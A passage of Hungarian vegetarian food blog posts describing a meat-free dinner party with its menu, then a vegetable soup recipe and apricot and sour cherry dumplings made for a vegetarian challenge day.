gördülékeny volt, valahogy úgy éreztük mind a négyen, mintha már réges-régen ismernénk egymást. A vacsi szinte már készen volt, ment minden, mintha a háziasszony mindig is ezt csinálta volna. Persze izgult ő is egy kicsit, mint ahogyan a tv műsorban is az aktuális házigazda, de nekem úgy tűnt, hogy aztán rövid idő alatt feloldódott. A menü annyira tökéletes volt, hogy közben többször eszembe jutott, hogy na most aztán felköthetem a gatyámat, ha ezt a szintet tartani szeretném. A köszöntő ital (magyarosan Welcome drink) krémes ananászlé volt. Megvallom fogalmam sincs, hogy pontosan mi volt benne, de szuper bevezetője volt az estének. Előételként paprikakrémet kaptunk, amit Emi friss paradicsomba, paprikába és zellerszárba töltve kínált nekünk. A főétel mártással leöntött, gombával, barnarizzsel töltött karalábé, szélesmetélttel. Hihetetlenül harmonikus és lágy ízhatása volt. A zsenge karalábé, a többféle gomba és a mártás.......mmmm. Most is összefut a nyál a számban. És akkor jött.......a tofu a tortán. Azt kell mondjam, a desszert is tökéletes volt. Vastag áfonyás tofukrém fedett egy vékonyabb levegős ,,piskóta tésztát. Sajnos ebből, már csak egy karcsú szeletet bírtam, amit azóta is sajnálok. Ha majd a receptek felkerülnek a Tofu a tortán-ra és Fitt anyuka blogjába, elkészítem otthon a családnak. Ha nagyon jót akartok enni, nektek is csak ajánlani tudom. Figyeljétek a fent említett blogokat, nehogy elszalasszátok a recepteket. Vacsi közben és után Vikike, Emi kislánya is szórakoztatott minket, vagy mi őt?:)) Nagyon nem akaródzott haza indulnunk, olyan jó volt beszélgetni olyan emberekkel akiknek teljesen azonos az érdeklődési körük, és persze volt még egy csomó téma amit nem is érintettünk. Hazafelé is egyfolytában arról áradoztunk, hogy mennyire jó, hogy találkoztunk. Jó ötlet volt Verától a ,,Tofu a tortán! Köszönjük Vera!! Örülök, hogy csatlakoztam a csapathoz, mert egy kellemes estét töltöttünk el együtt. Könnyű volt megtalálni a közös hangot, így Moncsi, Szilvi és Emi már az első találkozás után is közel kerültek a szívemhez. Ahogy visszaolvastam, amit írtam, pont olyan, mint egy iskolai fogalmazás: bevezetéssel, tárgyalással, befejezéssel, kissé patetikus hangnemben. Nem baj, pont ettől jó......
Nagy Vegetáriánus Kihívás Napja - A Menü
2009. június 29. La Cuisine d'Adéle
Mi is abszolváltuk a családdal a Nagy Vegetáriánus Kihívás Napját! És azt kell mondjam, igazán finomat ettünk! :-) Családom tagjai egyáltalán nem hiányolták a húst (Anyuval közösen készítettük el a menüt), jóízűen falatozták a vega, reformos - és egyben Hémangi kritériumainak is megfelelő - ételeket! Mindazonáltal a menü kissé ,,hagyományosra, ,,magyarosra sikeredett, de én egyáltalán nem bántam. Különösen azért nem, mert már hetek óta befészkelte magát a barackos gombóc a fejembe... s mi sem lehetett ideálisabb alakalom Siccike receptjének gyakorlati megvalósítására, mint a Nagy Vegetáriánus Kihívás Napja. Ezzel részben már el is árultam a menüt... s hogy mi került végülis az asztalra? Zöldségleves, utána pedig barackos és meggyes gombóc. Sokszor készítünk itthon zöldséglevest, én úgy gondolom, nálunk abszolút ,,klasszikusan, hagyományosan készül, de talán mások máshogyan készítik, s még úgysem szerepelt ez a recept itt a blogon, így az alábbiakban közzéteszem. Általában kerül bele nokedli is, ami azonban tojást tartalmaz, így ez most kimaradt, de a recept leírásánál szerepeltetem. Zöldségleves Hozzávalók: (4 tányér leveshez) 2 szál sárgarépa 2 vékony szál fehérrépa 1 kisebb darab zeller kevés olaj (bio repce) 1 mokkáskanálnyi teljes kiőrlésű bio búzaliszt 1 jókora csokor friss petrezselyem 1 bio zöldségleveskocka kb. 2 mokkáskanálnyi pirospaprika frissen őrölt bors só (himalaya) Opcionális - a nokedlihez teljes kiőrlésű bio búzaliszt 1 tojás kevés olaj só (himalaya) bors friss petrezselyem Elkészítés: A gyökérzöldségeket megtisztítom, megmosom, felkarikázom. Egy nagyobbacska fazékban kevés olajat hevítek és rádobom a zöldséget. Nagy lángon kevergetem, pirítom. Ha már kellemesen illatoznak a zöldségek, kis lángra veszem a gázt, lefedem az edényt és kb. 15 perc alatt puhára párolom a répákat. Ezután megszórom a liszttel, átkeverem. Rászórom a pirospaprikát, átforgatom, s felöntöm annyi vízzel, amennyi levest szeretnék. Beledobom a zellert, a leveskockát, frissen őrölt borsot tekerek rá - mehet bele egy fél zöldpaprika is, az íze kedvéért, amit a végén kihalászok majd belőle, én ezúttal nem tettem bele - sózom (ezzel óvatosan a leveskocka miatt!). Megvárom, míg felforr - vigyázok, nehogy kifusson! - kislángra veszem alatta a gázt, lefedem - de a fedőt úgy helyezem a fazékra, hogy kis rést hagyok, amin a felesleges gőz eltávozik - és úgy 20-25 percig főzöm. Amíg a leves fő, összevágom a petrezselymet, s ha nokedli is kerül bele, ezt is elkészítem. A nokedli készítés igazán nagyon egyszerű: csak mindent jó alaposan össze kell keverni, úgy hogy jó masszív állagú, már-már kemény tésztát kapjak. Mikor úgy gondolom, hogy a leves megfőtt és éppen nokedlikészítős hangulatom van, nagy lángra váltok és a lobogva forró levesbe kiskanállal beleszaggatom a nokedliket és pár perc alatt készre főzöm őketaz illatos-zöldséges lében. Majd elzárom a gázt, belekeverem az apróra vágott illatos petrezselymet és még forrón tányérokba szedem. A gombócokat - mint már fentebb kiderült - Siccike receptje alapján készítettük. Annyi módosítás volt, hogy minden gombócba egy egész sárgabarack került, egy fél bio nádkockacukorral a közepükben. 15 gyönyörűséges, szaftos és ízletes gombóc lett a jutalmunk. A maradék tésztából pedig meggyes gombócot gyártottunk. Szó szerint ugyanúgy készült, mint a sárgabarackos, csak a meggyhez nem adtunk pluszban cukrot. Ezek a gombócok méretre persze jóval kisebbek lettek, hiszen egy meggyszem is jóval kisebb egy sárgabarackhoz képest. Csak biztatni tudok mindenkit, hogy próbálja ki a meggyes gombócot, finom, lédús és zamatos. Nekem nagy-nagy kedvencem! A gombócokat fahéjas nádporcukorral megszórva ettük.
Szerintünk ez is ízleni fog ...
- ,,Minden étkezés után azt éreztem, hogy töltődöm - interjú Jordán Adéllal a vegán életmódról
- Fogyás, maratonfutás, megszűnő bőrproblémák - 6 inspiráló Veganuár-sikersztori
- A Veganuár nagykövete még soha nem evett húst - interjú Kovács Panka színésznővel
- Ezt próbáld ki, ha szereted az állatokat, és szívesen spórolnál is!
- Többéves rekordot döntött meg Steiner Kristóf és a Veganuár együttműködése: tízezrek nézték az élő főzést